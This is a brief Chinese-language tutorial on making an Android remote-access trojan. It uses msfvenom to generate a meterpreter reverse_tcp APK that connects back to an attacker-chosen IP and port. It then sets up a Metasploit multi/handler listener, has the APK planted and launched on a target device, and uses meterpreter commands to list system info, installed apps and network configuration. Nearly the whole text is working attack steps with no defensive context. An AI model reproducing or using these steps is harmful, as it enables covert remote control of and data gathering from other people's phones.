一、生成可执行木马
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.85.129 lport=7799 R > test.apk
lhost 本机ip
lport 监听端口
test.apk 生成的可执行木马文件名
二、设置msf监听
1.选择multi/handler模块
2.设置payload(和上面一样)
3.设置lhost和lport(同上)
4.运行
三、将test.apk上传至攻击目标并启动
成功msf成功建立session
四、窥探目标环境信息
sysinfo 系统信息
app_list 查看安装的app
ipconfig 查看网络配置信息